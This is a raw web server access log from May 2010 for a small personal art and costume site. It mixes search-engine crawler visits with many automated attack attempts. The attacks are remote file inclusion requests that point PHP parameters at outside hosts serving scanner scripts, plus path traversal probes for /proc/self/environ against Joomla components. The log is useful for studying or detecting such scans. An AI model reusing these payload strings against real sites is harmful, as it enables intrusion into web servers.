111.89.128.186 - - [18/May/2010:20:57:02 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
111.89.128.186 - - [18/May/2010:20:57:02 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
38.101.148.126 - - [18/May/2010:20:57:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [18/May/2010:20:58:21 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
87.250.255.243 - - [18/May/2010:21:00:54 -0500] "GET /logs/access_log.1187827200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.12 - - [18/May/2010:21:02:37 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 200 1591 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707)"
211.239.161.143 - - [18/May/2010:21:06:52 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
211.239.161.143 - - [18/May/2010:21:06:53 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
67.195.112.180 - - [18/May/2010:21:06:58 -0500] "GET /logs/access_log.1172016000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [18/May/2010:21:11:21 -0500] "GET /logs/access_log.1249689600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [18/May/2010:21:19:31 -0500] "GET /logs/access_log.1252454400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.136.55.2 - - [18/May/2010:21:21:05 -0500] "GET /logs/index.php?option=com_sefservicemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
174.136.55.2 - - [18/May/2010:21:21:05 -0500] "GET /index.php?option=com_sefservicemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.136.55.2 - - [18/May/2010:21:21:06 -0500] "GET /logs/index.php?option=com_sefservicemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
174.136.55.2 - - [18/May/2010:21:21:06 -0500] "GET /index.php?option=com_sefservicemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
207.46.204.179 - - [18/May/2010:21:23:06 -0500] "GET /logs/access_log.1189814400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
71.42.94.118 - - [18/May/2010:21:24:59 -0500] "GET /artwork/motto-chair-waste1.jpg HTTP/1.1" 200 25901 "-""-"
71.42.94.118 - - [18/May/2010:21:25:36 -0500] "GET /artwork/motto-chair-stitch3.jpg HTTP/1.1" 200 30810 "-""-"
121.88.4.141 - - [18/May/2010:21:25:36 -0500] "GET /logs/access_log.1262736000//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:21:25:36 -0500] "GET //////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 200 1011 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:21:25:36 -0500] "GET /logs//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 200 6159 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:21:26:16 -0500] "GET //////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 200 1011 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:21:26:18 -0500] "GET /logs/access_log.1262736000//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:21:26:26 -0500] "GET /logs//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 200 6159 "-""Mozilla/5.0"
193.47.80.46 - - [18/May/2010:21:26:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.46 - - [18/May/2010:21:26:31 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
80.65.166.74 - - [18/May/2010:21:26:51 -0500] "GET //index2.php?option=com_content&do_pdf=1&id=977///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
80.65.166.74 - - [18/May/2010:21:26:51 -0500] "GET /logs/access_log.1268956800%20%20//index2.php?option=com_content&do_pdf=1&id=977///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.65.166.74 - - [18/May/2010:21:26:51 -0500] "GET /logs//index2.php?option=com_content&do_pdf=1&id=977///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
80.65.166.74 - - [18/May/2010:21:27:11 -0500] "GET /logs//index2.php?option=com_content&do_pdf=1&id=977///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
80.65.166.74 - - [18/May/2010:21:27:11 -0500] "GET //index2.php?option=com_content&do_pdf=1&id=977///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
80.65.166.74 - - [18/May/2010:21:27:11 -0500] "GET /logs/access_log.1268956800%20%20//index2.php?option=com_content&do_pdf=1&id=977///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [18/May/2010:21:27:38 -0500] "GET /logs/access_log.1229990400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [18/May/2010:21:28:14 -0500] "GET /logs/access_log.1161302400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [18/May/2010:21:29:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
72.30.142.216 - - [18/May/2010:21:34:14 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [18/May/2010:21:34:15 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.101.148.126 - - [18/May/2010:21:34:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [18/May/2010:21:35:07 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
87.250.255.243 - - [18/May/2010:21:35:45 -0500] "GET /logs/access_log.1231372800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [18/May/2010:21:40:25 -0500] "GET /logs/access_log.1202342400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.50 - - [18/May/2010:21:44:36 -0500] "GET /logs/access_log.1183939200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:21:48:32 -0500] "GET /logs/access_log.1207872000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.239.161.143 - - [18/May/2010:21:50:35 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
211.239.161.143 - - [18/May/2010:21:50:36 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
207.46.199.53 - - [18/May/2010:21:53:07 -0500] "GET /logs/access_log.1222473600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [18/May/2010:21:53:54 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [18/May/2010:21:53:54 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [18/May/2010:21:55:30 -0500] "GET /logs/access_log.1249257600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.189 - - [18/May/2010:22:01:05 -0500] "GET /logs/access_log.1165622400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.201.194 - - [18/May/2010:22:01:16 -0500] "GET /logs/?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 6146 "-""Mozilla/5.0"
174.133.201.194 - - [18/May/2010:22:01:16 -0500] "GET /?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.133.201.194 - - [18/May/2010:22:01:16 -0500] "GET /logs/access_log.1268956800%20%20/?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
174.133.201.194 - - [18/May/2010:22:01:26 -0500] "GET /?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.133.201.194 - - [18/May/2010:22:01:26 -0500] "GET /logs/access_log.1268956800%20%20/?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
174.133.201.194 - - [18/May/2010:22:01:26 -0500] "GET /logs/?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 6146 "-""Mozilla/5.0"
174.133.201.194 - - [18/May/2010:22:01:45 -0500] "GET /logs/access_log.1273363200%20%20/?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
174.133.201.194 - - [18/May/2010:22:02:06 -0500] "GET /logs/access_log.1273363200%20%20/?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
87.250.255.243 - - [18/May/2010:22:04:46 -0500] "GET /logs/access_log.1248652800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.201.194 - - [18/May/2010:22:04:46 -0500] "GET /logs/access_log.1268956800/?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.133.201.194 - - [18/May/2010:22:04:48 -0500] "GET /logs/access_log.1273363200/?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.133.201.194 - - [18/May/2010:22:05:14 -0500] "GET /logs/access_log.1268956800/?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.133.201.194 - - [18/May/2010:22:05:16 -0500] "GET /logs/access_log.1273363200/?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.46.199.183 - - [18/May/2010:22:08:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [18/May/2010:22:10:56 -0500] "GET /logs/access_log.1209945600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [18/May/2010:22:11:00 -0500] "GET /logs/access_log.1210118400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [18/May/2010:22:11:00 -0500] "GET /logs/access_log.1210291200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [18/May/2010:22:11:03 -0500] "GET /logs/access_log.1210377600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [18/May/2010:22:11:05 -0500] "GET /logs/access_log.1210550400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [18/May/2010:22:11:07 -0500] "GET /logs/access_log.1210723200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [18/May/2010:22:11:10 -0500] "GET /logs/access_log.1210982400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [18/May/2010:22:11:12 -0500] "GET /logs/access_log.1211155200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [18/May/2010:22:11:15 -0500] "GET /logs/access_log.1211241600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [18/May/2010:22:11:17 -0500] "GET /logs/access_log.1211328000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [18/May/2010:22:11:43 -0500] "GET /logs/access_log.1184976000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.232 - - [18/May/2010:22:15:06 -0500] "GET /logs/access_log.1240790400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:22:16:21 -0500] "GET /logs/access_log.1249862400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.100.59.16 - - [18/May/2010:22:21:39 -0500] "GET /logs/access_log.1273276800/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.831"
208.100.59.16 - - [18/May/2010:22:21:39 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
208.100.59.16 - - [18/May/2010:22:21:39 -0500] "GET /logs/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.100.59.16 - - [18/May/2010:22:21:57 -0500] "GET /logs/access_log.1273276800/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.831"
208.100.59.16 - - [18/May/2010:22:21:58 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
208.100.59.16 - - [18/May/2010:22:21:58 -0500] "GET /logs/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
87.250.255.243 - - [18/May/2010:22:22:10 -0500] "GET /logs/access_log.1196035200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
59.42.10.71 - - [18/May/2010:22:23:49 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.831"
59.42.10.71 - - [18/May/2010:22:23:49 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.831"
207.46.204.241 - - [18/May/2010:22:27:37 -0500] "GET /logs/access_log.1175990400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:22:29:09 -0500] "GET /logs/access_log.1243209600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
59.42.10.71 - - [18/May/2010:22:30:03 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.831"
59.42.10.71 - - [18/May/2010:22:30:04 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.831"
59.42.10.71 - - [18/May/2010:22:30:04 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.831"
207.46.204.191 - - [18/May/2010:22:30:06 -0500] "GET /logs/access_log.1220140800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
59.42.10.71 - - [18/May/2010:22:30:09 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.831"
59.42.10.71 - - [18/May/2010:22:30:11 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.831"
59.42.10.71 - - [18/May/2010:22:30:12 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.831"
59.42.10.71 - - [18/May/2010:22:32:25 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.831"
59.42.10.71 - - [18/May/2010:22:32:25 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.831"
207.46.204.180 - - [18/May/2010:22:34:07 -0500] "GET /logs/access_log.1271721600 HTTP/1.1" 200 586690 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.234 - - [18/May/2010:22:34:36 -0500] "GET /logs/access_log.1203379200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:22:39:36 -0500] "GET /logs/access_log.1206144000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.85 - - [18/May/2010:22:41:06 -0500] "GET /logs/access_log.1261785600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:22:46:36 -0500] "GET /logs/access_log.1225670400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.131 - - [18/May/2010:22:53:36 -0500] "GET /logs/access_log.1233014400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.53 - - [18/May/2010:22:54:37 -0500] "GET /logs/access_log.1239321600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:22:55:54 -0500] "GET /logs/access_log.1201478400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [18/May/2010:22:57:44 -0500] "GET /logs/access_log.1200960000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.65.40 - - [18/May/2010:22:57:45 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [18/May/2010:23:01:43 -0500] "GET /artwork/txt.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.252.3.123 - - [18/May/2010:23:03:17 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.displaystandsuk.co.uk//Oid1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.252.3.123 - - [18/May/2010:23:03:17 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.displaystandsuk.co.uk//Oid1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.252.3.123 - - [18/May/2010:23:03:17 -0500] "GET /logs/access_log.1273017600%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.displaystandsuk.co.uk//Oid1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
87.250.255.243 - - [18/May/2010:23:08:08 -0500] "GET /logs/access_log.1200787200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [18/May/2010:23:12:51 -0500] "GET /logs/access_log.1244937600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.47 - - [18/May/2010:23:17:38 -0500] "GET /logs/access_log.1220832000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:23:19:53 -0500] "GET /logs/access_log.1209254400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
80.71.1.68 - - [18/May/2010:23:21:33 -0500] "GET //index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.71.1.68 - - [18/May/2010:23:21:33 -0500] "GET /logs//index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
206.210.68.43 - - [18/May/2010:23:22:46 -0500] "GET /?INCLUDE_FOLDER=http://our.anet.com//modules/1.gif?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
206.210.68.43 - - [18/May/2010:23:22:46 -0500] "GET /logs/access_log.1265587200/?INCLUDE_FOLDER=http://our.anet.com//modules/1.gif?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
206.210.68.43 - - [18/May/2010:23:22:46 -0500] "GET /logs/?INCLUDE_FOLDER=http://our.anet.com//modules/1.gif?? HTTP/1.1" 200 6146 "-""Mozilla/5.0"
87.106.26.60 - - [18/May/2010:23:23:15 -0500] "GET //index.php?BASEPATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.26.60 - - [18/May/2010:23:23:16 -0500] "GET /logs//index.php?BASEPATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
206.210.68.43 - - [18/May/2010:23:23:17 -0500] "GET /logs/access_log.1264032000/?INCLUDE_FOLDER=http://our.anet.com//modules/1.gif?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.195.112.180 - - [18/May/2010:23:24:31 -0500] "GET /costume/costume1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [18/May/2010:23:24:36 -0500] "GET /logs/access_log.1175817600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.239.161.143 - - [18/May/2010:23:26:37 -0500] "GET //index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.239.161.143 - - [18/May/2010:23:26:38 -0500] "GET /logs//index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
211.239.161.143 - - [18/May/2010:23:26:45 -0500] "GET //index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.239.161.143 - - [18/May/2010:23:26:46 -0500] "GET /logs//index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.46.204.181 - - [18/May/2010:23:29:08 -0500] "GET /logs/access_log.1234310400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:23:32:50 -0500] "GET /logs/access_log.1249430400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [18/May/2010:23:36:52 -0500] "GET /logs/access_log.1157932800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.186 - - [18/May/2010:23:40:07 -0500] "GET /logs/access_log.1253145600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.0.74.195 - - [18/May/2010:23:40:11 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
124.0.74.195 - - [18/May/2010:23:40:11 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
